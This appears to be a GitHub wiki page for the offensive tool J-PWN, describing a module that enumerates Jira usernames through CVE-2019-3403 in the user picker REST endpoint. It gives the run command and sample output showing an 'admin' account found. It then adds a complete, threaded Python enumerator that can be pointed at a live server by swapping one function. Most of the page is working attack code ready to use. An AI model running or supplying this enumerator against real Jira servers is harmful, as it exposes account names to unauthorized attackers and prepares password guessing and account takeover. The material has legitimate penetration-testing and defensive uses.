CVE-2019-3403 Brute Force - carnal0wnage/J-PWN GitHub Wiki

CVE-2019-3403 Brute Force

This threaded module guesses usernames against the URL below via CVE-2019-3403, an incorrect authorisation check in Jira's user picker REST resource that lets an unauthenticated remote attacker enumerate usernames. Affected versions are Jira Server/Data Center before 7.13.3, 8.0.0 before 8.0.4, and 8.1.0 before 8.1.1.

module name: cve_2019_3403_brute

url: /rest/api/2/user/picker?query={username}

python3 j-pwn.py --single http://JIRASERVER --module cve_2019_3403_brute --dict ../usernames/first.last100.txt

[INFO] Running module cve_2019_3403_brute with dictionary ../usernames/first.last100.txt
INFO: Total usernames to check: 101
+ Valid username found: admin | URL: JIRASERVER/rest/api/2/user/picker?query=admin

+ Vulnerabilities Found:
+ [Username Enumeration] Valid username found: admin

Notes:

  • The module prints progress messages so you can see what it is doing
  • You can set verbose = True in the module code if you want to see each request being made
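The check the module relies on, written out as an added example (this is not J-PWN's own module code). It assumes the picker answers a 200 with JSON of the form {"users": [{"name": ..., "key": ..., "displayName": ...}], "total": N, "header": ...}, which is my recollection of the endpoint's response and not something the page states; the sample responses are constructed. Two details matter in practice: the picker matches partially (query "jsmith" can return "jsmith2"), so "total > 0" alone gives false positives and the code requires an entry whose name equals the query; and a patched Jira answers anonymous requests with 401/403, which the code reports as "undetermined" rather than "not found" so a fixed target is not misread as having no users.

```python
"""Username enumeration via the Jira user picker (CVE-2019-3403).

Added example for this wiki page, not J-PWN's module code.  The JSON shape of
/rest/api/2/user/picker responses and the exact-match rule are assumptions;
the responses in CONSTRUCTED_RESPONSES are constructed, not captured.
"""
import json
import urllib.error
import urllib.parse
import urllib.request
from concurrent.futures import ThreadPoolExecutor
from typing import Callable, Iterable, List, Optional, Tuple

PICKER_PATH = "/rest/api/2/user/picker?query="

# Constructed responses keyed by query, standing in for a live Jira server.
CONSTRUCTED_RESPONSES = {
    # exact hit: the picker echoes the account under "name"
    "admin": (200, json.dumps({
        "users": [{"name": "admin", "key": "admin", "displayName": "Administrator",
                   "html": "Administrator - <strong>admin</strong>"}],
        "total": 1, "header": "Showing 1 of 1 matching users"})),
    # partial hit only: "jsmith" matches "jsmith2", so it must NOT count as valid
    "jsmith": (200, json.dumps({
        "users": [{"name": "jsmith2", "key": "jsmith2", "displayName": "John Smith"}],
        "total": 1, "header": "Showing 1 of 1 matching users"})),
    "nobody": (200, json.dumps({"users": [], "total": 0,
                                "header": "Showing 0 of 0 matching users"})),
}


def picker_url(base_url: str, username: str) -> str:
    """Build the picker URL; percent-encode the candidate so '&' or '#' cannot break the query."""
    return base_url.rstrip("/") + PICKER_PATH + urllib.parse.quote(username, safe="")


def is_valid_username(status: int, body: str, username: str) -> Optional[bool]:
    """Decide from one picker response whether `username` exists.

    True/False on a 200 with parseable JSON; None when the endpoint does not
    answer anonymously (401/403 on a patched Jira) or the body is not JSON.
    Jira usernames are case-insensitive, so the comparison is too.
    """
    if status != 200:
        return None
    try:
        data = json.loads(body)
    except ValueError:
        return None
    users = data.get("users") or []
    return any((u.get("name") or "").lower() == username.lower() for u in users)


def fetch_live(base_url: str, username: str, timeout: float = 10.0) -> Tuple[int, str]:
    """Real HTTP fetcher (not used by the offline demo). Returns (status, body)."""
    req = urllib.request.Request(picker_url(base_url, username),
                                 headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode("utf-8", "replace")


def fetch_constructed(base_url: str, username: str) -> Tuple[int, str]:
    """Offline stand-in returning the constructed responses above."""
    return CONSTRUCTED_RESPONSES.get(username, (200, '{"users": [], "total": 0}'))


def enumerate_usernames(base_url: str, candidates: Iterable[str],
                        fetch: Callable[[str, str], Tuple[int, str]],
                        threads: int = 10) -> Tuple[List[str], List[str]]:
    """Threaded enumeration. Returns (confirmed usernames, undetermined queries)."""
    def check(name: str) -> Tuple[str, Optional[bool]]:
        status, body = fetch(base_url, name)
        return name, is_valid_username(status, body, name)

    valid, undetermined = [], []
    with ThreadPoolExecutor(max_workers=threads) as pool:
        for name, verdict in pool.map(check, candidates):
            if verdict is None:
                undetermined.append(name)
            elif verdict:
                valid.append(name)
    return sorted(valid), sorted(undetermined)


if __name__ == "__main__":
    # Swap fetch_constructed for fetch_live to run against a real target.
    found, unknown = enumerate_usernames("http://JIRASERVER", ["admin", "jsmith", "nobody"],
                                         fetch_constructed)
    for name in found:
        print(f"+ Valid username found: {name} | URL: {picker_url('http://JIRASERVER', name)}")
    if unknown:
        print(f"[WARN] {len(unknown)} queries got no anonymous JSON answer; target may be patched")
```

If every candidate ends up in the undetermined list, the endpoint is requiring authentication and the target is most likely patched; do not read that as "no valid users".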